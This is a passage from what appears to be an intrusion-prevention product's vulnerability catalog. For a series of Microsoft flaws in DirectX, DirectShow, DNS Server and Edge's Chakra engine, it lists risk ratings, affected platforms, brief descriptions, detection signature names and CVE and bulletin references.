https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43468
ms24-oct
http://technet.microsoft.com/security/bulletin/ms24-oct
Back to top

Microsoft-Data-Access-Insecure-Library-Loading-CVE-2011-1975

About this vulnerability: A vulnerability in Microsoft Data Access Components
Risk: Moderate
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Data Access Components
Type: Malfunction
Description: A vulnerability in Microsoft Data Access Components
Situation: HTTP_CSU-Microsoft-Data-Access-Insecure-Library-Loading-CVE-2011-1975
SMB-TCP_CHS_Microsoft-Data-Access-Insecure-Library-Loading-CVE-2011-1975
References:
CVE-2011-1975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1975
MS11-059
http://technet.microsoft.com/security/bulletin/MS11-059
Back to top

Microsoft-Data-Analyzer-ActiveX-Control-Code-Execution-CVE-2010-0252

About this vulnerability: A code execution vulnerability in the Microsoft Data Analyzer ActiveX Control
Risk: High
First detected in: sgpkg-ips-282-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a remote code execution vulnerability in the Microsoft Data Analyzer ActiveX Control.
Situation: HTTP_SS-Microsoft-Data-Analyzer-ActiveX-Control-Code-Execution-CVE-2010-0252
File-Text_Microsoft-Data-Analyzer-ActiveX-Control-Code-Execution-CVE-2010-0252
References:
CVE-2010-0252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0252
MS10-008
http://technet.microsoft.com/security/bulletin/MS10-008
Back to top

Microsoft-Defender-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Defender detected
Risk: High
First detected in: sgpkg-ips-1402-5242
Last changed: sgpkg-ips-1402-5242
Platform: Windows
Software: Microsoft Windows Defender
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Defender detected.
Situation: File-Text_Microsoft-Defender-Remote-Code-Execution
References:
CVE-2021-42298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42298
Back to top

Microsoft-Defender-Remote-Code-Execution-Vulnerability-CVE-2021-1647

About this vulnerability: A vulnerability in Microsoft Windows Defender
Risk: High
First detected in: sgpkg-ips-1312-5242
Last changed: sgpkg-ips-1312-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A remote code execution vulnerability exists in Microsoft Windows Defender. Copying an exploit file to a vulnerable system may result in remote code execution.
Situation: File-Exe_Executable-Matching-Exploit-CVE-2021-1647-2
File-Exe_Executable-Matching-Exploit-CVE-2021-1647-1
References:
CVE-2021-1647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1647
ms21-jan
http://technet.microsoft.com/security/bulletin/ms21-jan
Back to top

Microsoft-DHCP-Server-Service-Remote-Code-Execution-Vulnerability-CVE-2023-28231

About this vulnerability: An attempt to exploit a vulnerability in Microsoft DHCP service detected
Risk: High
First detected in: sgpkg-ips-1577-5242
Last changed: sgpkg-ips-1577-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: An out-of-bound write issue has been identified in Microsoft's DHCP service. This vulnerability can be exploited to achieve remote code execution.
Situation: Generic_UDP-Microsoft-DHCP-Server-Service-Remote-Code-Execution-Vulnerability-CVE-2023-28231
References:
CVE-2023-28231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28231
ms23-apr
http://technet.microsoft.com/security/bulletin/ms23-apr
Back to top

Microsoft-DHTML-Editing-Component-ActiveX-Control-Remote-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-242-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP4; Windows XP SP2; Windows XP 64-bit SP2; Windows 2003
Software: <os>
Type: Input Validation
Description: There is a remote code execution vulnerability in Microsoft Windows DHTML Editing ActiveX control.
Situation: HTTP_SS-Microsoft-DHTML-Editing-Component-ActiveX-Control-Remote-Execution
File-Text_Microsoft-DHTML-Editing-Component-ActiveX-Control-Remote-Execution
References:
CVE-2009-2519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2519
BID-36280
http://www.securityfocus.com/bid/36280
MS09-046
http://technet.microsoft.com/security/bulletin/MS09-046
Back to top

Microsoft-Direct2d-SVG-Path-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: <os>
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Microsoft's Direct2D library. The vulnerability is due to the way the library handles certain 2D geometric figures. A remote attacker can exploit this vulnerability by enticing a user to download and process a file containing specially crafted 2D figures.
Situation: File-TextId_Microsoft-Direct2d-SVG-Path-Memory-Corruption
References:
CVE-2014-0263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0263
MS14-007
http://technet.microsoft.com/security/bulletin/MS14-007
Back to top

Microsoft-DirectPlay-Denial-Of-Service

About this vulnerability: A vulnerability in DirectX
Risk: High
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DirectX
Type: Input Validation
Description: A denial of service vulnerability exists in the IDirectPlay4 application programming interface (API) of Microsoft DirectPlay, due to insufficient input validation of incoming network data. Any applications using this component of DirectX (typically network capable games) can fail if an attacker launches an attack against the application by sending malformed DirectPlay packets. The application has to be restarted to resume normal functionality.
Situation: Generic_CS-Microsoft-DirectPlay-Denial-Of-Service
Generic_UDP-Microsoft-DirectPlay-Denial-Of-Service
References:
CVE-2004-0202
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0202
BID-10487
http://www.securityfocus.com/bid/10487
OSVDB-6742
http://www.osvdb.org/6742
MS04-016
http://technet.microsoft.com/security/bulletin/MS04-016
Back to top

Microsoft-DirectPlay-Heap-Overflow-Vulnerability

About this vulnerability: A vulnerability in Microsoft DirectPlay
Risk: High
First detected in: sgpkg-ips-497-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2; Windows 8; Windows 2012
Software: DirectX
Type: Buffer Overflow
Description: There is a heap overflow vulnerability in Microsoft DirectPlay.
Situation: File-OLE_Microsoft-DirectPlay-Heap-Overflow-Vulnerability
File-Text_Microsoft-DirectPlay-Heap-Overflow-Vulnerability
References:
CVE-2012-1537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1537
MS12-082
http://technet.microsoft.com/security/bulletin/MS12-082
Back to top

Microsoft-DirectShow-Audio-Decoder-Stack-Overflow

About this vulnerability: A vulnerability in Microsoft DirectShow
Risk: High
First detected in: sgpkg-ips-300-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008
Software: <os>
Type: Input Validation
Description: There is a vulnerability in Microsoft DirectShow.
Situation: HTTP_SS-Microsoft-DirectShow-Audio-Decoder-Stack-Overflow
File-RIFF_Microsoft-DirectShow-Audio-Decoder-Stack-Overflow
References:
CVE-2010-0480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0480
MS10-026
http://technet.microsoft.com/security/bulletin/MS10-026
Back to top

Microsoft-DirectShow-Heap-Overflow

About this vulnerability: A vulnerability in Microsoft DirectShow
Risk: High
First detected in: sgpkg-ips-283-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7
Software: <os>
Type: Input Validation
Description: There is a vulnerability in Microsoft DirectShow.
Situation: HTTP_SS-Microsoft-DirectShow-Heap-Overflow
File-RIFF_Microsoft-DirectShow-Heap-Overflow
References:
CVE-2010-0250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0250
BID-38112
http://www.securityfocus.com/bid/38112
MS10-013
http://technet.microsoft.com/security/bulletin/MS10-013
Back to top

Microsoft-DirectShow-MPEG-Layer-3-Audio-Decoder-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A code execution vulnerability has been reported in Microsoft DirectShow MPEG Layer-3 Audio Decoder. The vulnerability is due to memory corruption while decoding specially crafted media files. An attacker can exploit this vulnerability by enticing a user to process a malicious audio file. This can lead to memory corruption and the possibility of code execution in the context of the logged in user.
Situation: File-Binary_Microsoft-DirectShow-MPEG-Layer-3-Audio-Decoder-Memory-Corruption
References:
CVE-2010-1882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1882
MS10-052
http://technet.microsoft.com/security/bulletin/MS10-052
Back to top

Microsoft-DirectShow-QuickTime-Atom-Size-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft DirectX
Risk: Moderate
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DirectX
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft DirectShow QuickTime Movie Parser filter. A remote attacker can use this to execute code on the affected system.
Situation: File-MPEG_Microsoft-DirectShow-QuickTime-Atom-Size-Memory-Corruption
References:
CVE-2009-1539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1539
MS09-028
http://technet.microsoft.com/security/bulletin/MS09-028
Back to top

Microsoft-DirectShow-QuickTime-Movie-Parsing-Code-Execution

About this vulnerability: A vulnerability in Microsoft DirectX
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DirectX
Type: Malfunction
Description: A memory corruption vulnerability exists in DirectShow technology in Microsoft DirectX.
Situation: HTTP_SS-Microsoft-DirectShow-QuickTime-Movie-Parsing-Code-Execution
File-MPEG_Microsoft-DirectShow-QuickTime-Movie-Parsing-Code-Execution
References:
CVE-2009-1537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1537
BID-35139
http://www.securityfocus.com/bid/35139
OSVDB-54797
http://www.osvdb.org/54797
MS09-028
http://technet.microsoft.com/security/bulletin/MS09-028
Back to top

Microsoft-DirectShow-QuickTime-Stsc-Atom-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft DirectX
Risk: Moderate
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DirectX
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft DirectShow QuickTime Movie Parser filter.
Situation: File-MPEG_Microsoft-DirectShow-QuickTime-Stsc-Atom-Parsing-Memory-Corruption
References:
CVE-2009-1538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1538
MS09-028
http://technet.microsoft.com/security/bulletin/MS09-028
Back to top

Microsoft-DirectShow-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft DirectShow
Risk: High
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003
Software: DirectX
Type: Buffer Overflow
Description: There is a vulnerability in the DirectShow component of Microsoft DirectX.
Situation: HTTP_SS-Microsoft-DirectShow-Remote-Code-Execution
File-MPEG_Microsoft-DirectShow-Remote-Code-Execution
References:
CVE-2009-1537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1537
BID-35139
http://www.securityfocus.com/bid/35139
OSVDB-54797
http://www.osvdb.org/54797
MS09-028
http://technet.microsoft.com/security/bulletin/MS09-028
Back to top

Microsoft-DirectX-Sami-File-Parsing-Code-Execution

About this vulnerability: A buffer overflow vulnerability in Microsoft DirectX
Risk: High
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000
Software: DirectX
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Microsoft DirectX application framework. The vulnerability is due to the way certain DirectX libraries handle specially crafted Synchronized Accessible Media Interchange (SAMI) files. A remote attacker could exploit this vulnerability by persuading a user to open a specially crafted SAMI file, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.
Situation: HTTP_SS-Microsoft-DirectX-Sami-File-Parsing-Code-Execution
File-TextId_Microsoft-DirectX-Sami-File-Parsing-Code-Execution
References:
CVE-2007-3901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3901
BID-26789
http://www.securityfocus.com/bid/26789
MS07-064
http://technet.microsoft.com/security/bulletin/MS07-064
Back to top

Microsoft-DirectX-Sami-Format-Parsing-Code-Execution

About this vulnerability: A vulnerability in Microsoft DirectX
Risk: High
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DirectX
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Microsoft DirectX application framework. The vulnerability is due to the way certain DirectX libraries handle specially crafted Synchronized Accessible Media Interchange (SAMI) file type. A remote attacker could exploit this vulnerability by persuading a user to open a specially crafted SAMI file, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.
Situation: HTTP_SS-Microsoft-DirectX-Sami-Format-Parsing-Code-Execution
File-TextId_Microsoft-DirectX-Sami-Format-Parsing-Code-Execution
References:
CVE-2008-1444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1444
BID-29578
http://www.securityfocus.com/bid/29578
MS08-033
http://technet.microsoft.com/security/bulletin/MS08-033
Back to top

Microsoft-DirectX-WAV-And-AVI-File-Parsing-Code-Execution

About this vulnerability: A vulnerability in Microsoft DirectX
Risk: High
First detected in: sgpkg-ips-134-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows Vista; Windows 2003
Software: <os>
Type: Integer Overflow
Description: There is a buffer overflow vulnerability in the Microsoft DirectX application framework. The vulnerability is due to the way certain DirectX libraries handle specially crafted WAV and AVI files. A remote attacker could exploit this vulnerability by persuading a user to open a specially crafted WAV or AVI file, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.
Situation: HTTP_SS-Microsoft-DirectX-WAV-And-AVI-File-Parsing-Code-Execution
File-RIFF_Microsoft-DirectX-WAV-And-AVI-File-Parsing-Code-Execution
References:
CVE-2007-3895
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3895
BID-26804
http://www.securityfocus.com/bid/26804
MS07-064
http://technet.microsoft.com/security/bulletin/MS07-064
Back to top

Microsoft-DNS-Server-Any-Query-Cache-Weakness

About this vulnerability: A Microsoft DNS Server ANY Query Cache Weakness vulnerability
Risk: High
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Server
Type: Dns Spoof
Description: A vulnerability in Microsoft DNS Server which allows remote attackers to have greater predictability of transaction IDs used by the DNS server, and thus facilitate DNS cache poisoning and redirection of Internet traffic, due to a response validation flaw where specifically crafted DNS responses are not correctly cached.
Situation: DNS-UDP_Microsoft-DNS-Server-Any-Query-Cache-Weakness
References:
CVE-2009-0234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0234
Back to top

Microsoft-DNS-Server-Denial-of-Service

About this vulnerability: A Microsoft DNS Server Denial of Service vulnerability
Risk: High
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Server
Type: Malfunction
Description: A vulnerability in Microsoft DNS Server which allows remote attackers to cause a denial of service condition by sending crafted requests to a target DNS server due to the way in which DNS Resource Records are handled by the server.
Situation: DNS-UDP_Microsoft-DNS-Server-Denial-of-Service
DNS-UDP_Microsoft-DNS-Server-Denial-of-Service-2
References:
CVE-2012-0006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0006
Back to top

Microsoft-DNS-Server-WPAD-Registration-Spoofing

About this vulnerability: A vulnerability in Microsoft Windows' DNS server
Risk: Moderate
First detected in: sgpkg-ips-212-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 Server; Windows 2003; Windows 2008
Software: <os>
Type: Insecure Configuration
Description: There is a man-in-the-middle vulnerability in the DNS server shipped with various versions of Windows Server. The DNS server allows dynamic registration of the host name "wpad" in the domain. Successful exploitation may allow the attacker to redirect Internet traffic to an arbitrary host.
Situation: DNS-UDP_Dynamic-DNS-WPAD-Host-Name-Registration
References:
CVE-2009-0093
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0093
BID-33989
http://www.securityfocus.com/bid/33989
OSVDB-52519
http://www.osvdb.org/52519
MS09-008
http://technet.microsoft.com/security/bulletin/MS09-008
Back to top

Microsoft-Dynamics-AX-Cross-Site-Scripting-Vulnerability

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Dynamics AX detected
Risk: High
First detected in: sgpkg-ips-457-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Dynamics AX
Type: Cross-site Scripting
Description: There is an XSS vulnerability in Microsoft Dynamics AX Enterprise Portal.
Situation: HTTP_CRL-Microsoft-Dynamics-AX-Cross-Site-Scripting-Vulnerability
References:
CVE-2012-1857
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1857
MS12-040
http://technet.microsoft.com/security/bulletin/MS12-040
Back to top

Microsoft-Edge-And-Internet-Explorer-Chakra-CVE-2018-8145-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1130-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer 10.0; Internet Explorer 11.0
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability has been reported in Microsoft Edge's and Microsoft Internet Explorer's Chakra JavaScript Engine. The vulnerability is due to incorrect optimization of loops with induction variables by the Chakra JIT engine. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Microsoft-Edge-And-Internet-Explorer-Chakra-CVE-2018-8145-Heap-Buffer-Overflow
References:
CVE-2018-8145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8145
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Microsoft-Edge-And-Internet-Explorer-CVE-2016-3326-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer and Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0; Microsoft Edge
Type: Malfunction
Description: There exists a use-after-free vulnerability in Microsoft Edge and Internet Explorer. A remote, unauthenticated attacker could use this to access sensitive information on the target system.
Situation: File-Text_Microsoft-Edge-And-Internet-Explorer-CVE-2016-3326-Use-After-Free
References:
CVE-2016-3326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3326
MS16-096
http://technet.microsoft.com/security/bulletin/MS16-096
Back to top

Microsoft-Edge-And-Internet-Explorer-Information-Disclosure-CVE-2017-8529

About this vulnerability: Microsoft Edge And Internet Explorer Information Disclosure CVE-2017-8529 vulnerability
Risk: Moderate
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer
Type: Malfunction
Description: A information discolsure vulnerability in Microsoft Edge and Internet Explorer which enables remote attackers to detect specific files on the remote system through window.print().
Situation: File-Text_Microsoft-Edge-And-Internet-Explorer-Information-Disclosure-CVE-2017-8529
References:
CVE-2017-8529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8529
ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun
Back to top

Microsoft-Edge-Array.join-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-816-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion execution vulnerability in the Microsoft Edge scripting engine. A remote attacker can use this to disclose information or execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Array.join-Type-Confusion
References:
CVE-2016-7189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7189
MS16-119
http://technet.microsoft.com/security/bulletin/MS16-119
Back to top

Microsoft-Edge-Asm.js-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-894-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in the Microsoft Edge Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Asm.js-Type-Confusion
References:
CVE-2017-0093
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0093
ms17-apr
http://technet.microsoft.com/security/bulletin/ms17-apr
Back to top

Microsoft-Edge-Asmjsinterpreter-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a use-after-free vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Asmjsinterpreter-Use-After-Free
References:
CVE-2017-8603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8603
ms17-aug
http://technet.microsoft.com/security/bulletin/ms17-aug
Back to top

Microsoft-Edge-Boxstackinstance-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There has been reported a type confusion vulnerability in Microsoft Edge Chakra JavaScript Engine. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.
Situation: File-Text_Microsoft-Edge-Boxstackinstance-Type-Confusion
References:
CVE-2018-0934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0934
Back to top

Microsoft-Edge-Buffer-Overrun-Vulnerability-CVE-2019-0642

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a buffer overrun vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft-Edge-Buffer-Overrun-Vulnerability-CVE-2019-0642
References:
CVE-2019-0642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0642
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Microsoft-Edge-Chakra-Arguments-Off-By-One

About this vulnerability: A vulnerability in Windows
Risk: Moderate
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A vulnerability in Windows
Situation: File-Text_Microsoft-Edge-Chakra-Arguments-Off-By-One
References:
CVE-2017-8671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8671
Back to top

Microsoft-Edge-Chakra-Array.map-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion execution vulnerability in the Microsoft Edge scripting engine. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Chakra-Array.map-Type-Confusion
References:
CVE-2016-7190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7190
MS16-119
http://technet.microsoft.com/security/bulletin/MS16-119
Back to top

Microsoft-Edge-Chakra-Array.shift-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-835-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Edge's scripting engine Chakra. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Chakra-Array.shift-Type-Confusion
References:
CVE-2016-7201
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7201
MS16-129
http://technet.microsoft.com/security/bulletin/MS16-129
Back to top

Microsoft-Edge-Chakra-Asmjsbytecodegenerator-Emitcall-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1045-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There has been reported a type confusion vulnerability Microsoft Edge's JavaScript engine. This vulnerability can be exploited by having a target user open maliciously crafted web page.
Situation: File-Text_Microsoft-Edge-Chakra-Asmjsbytecodegenerator-Emitcall-Type-Confusion
References:
CVE-2018-0780
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0780
Back to top

Microsoft-Edge-Chakra-Eval-CVE-2017-8636-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in Microsoft Edge Chakra JavaScript Engine. A remote attacker could use this to execute arbitrary code in the security context of the target user.
Situation: File-Text_Microsoft-Edge-Chakra-Eval-CVE-2017-8636-Integer-Overflow
References:
CVE-2017-8636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8636
ms17-aug
http://technet.microsoft.com/security/bulletin/ms17-aug
Back to top

Microsoft-Edge-Chakra-Eval-Integer-Overflow-CVE-2017-8641

About this vulnerability: A vulnerability in Microsoft Edge Chakra
Risk: High
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Edge
Type: Integer Overflow
Description: An integer overflow vulnerability in Microsoft Edge Chakra which allows remote attackers to execute arbitrary code by sending a specially crafted web page with an overly large argument being sent to the eval() function.
Situation: File-Text_Microsoft-Edge-Chakra-Eval-Integer-Overflow-CVE-2017-8641
References:
CVE-2017-8641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8641
Back to top

Microsoft-Edge-Chakra-Inlinearraypush-Inlinearraypop-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There has been reported a type confusion vulnerability in Microsoft Edge Chakra JavaScript Engine. Successful exploitation can lead in arbitrary code execution.
Situation: File-Text_Microsoft-Edge-Chakra-Inlinearraypush-Inlinearraypop-Type-Confusion
References:
CVE-2018-8617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8617
Back to top

Microsoft-Edge-Chakra-JavaScript-Engine-CVE-2016-0193-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-764-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Edge Chakra JavaScript Engine. A successful exploitation can lead to arbitrary code execution.
Situation: File-Text_Microsoft-Edge-Chakra-JavaScript-Engine-CVE-2016-0193-Memory-Corruption
References:
CVE-2016-0193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0193
MS16-052
http://technet.microsoft.com/security/bulletin/MS16-052
Back to top

Microsoft-Edge-Chakra-LowerBoundCheck-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Edge and ChakraCore
Risk: High
First detected in: sgpkg-ips-1081-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge; ChakraCore
Type: Malfunction
Description: An integer overflow vulnerability in Microsoft Edge and ChakraCore exists that allows an attacker to gain the same user rights as the current user due to how the scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.
Situation: File-Text_Microsoft-Edge-Chakra-LowerBoundCheck-Integer-Overflow
References:
CVE-2017-11861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11861
BID-101723
http://www.securityfocus.com/bid/101723
Back to top

Microsoft-Edge-Chakra-Method-Propertystring-Object-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Edge's JavaScript engine Chakra. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-Chakra-Method-Propertystring-Object-Type-Confusion
References:
CVE-2017-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0094
MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007
Back to top

Microsoft-Edge-Chakra-MinInAnArray-MaxInAnArray-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: A vulnerability in Microsoft Edge Chakra JavaScript Engine which allows remote attackers to execute arbitrary code by sending a specially crafted web page or document, due to insufficient validation within the MinInAnArray() and MaxInAnArray() functions.
Situation: File-Text_Microsoft-Edge-Chakra-MinInAnArray-MaxInAnArray-Type-Confusion
References:
CVE-2017-11893
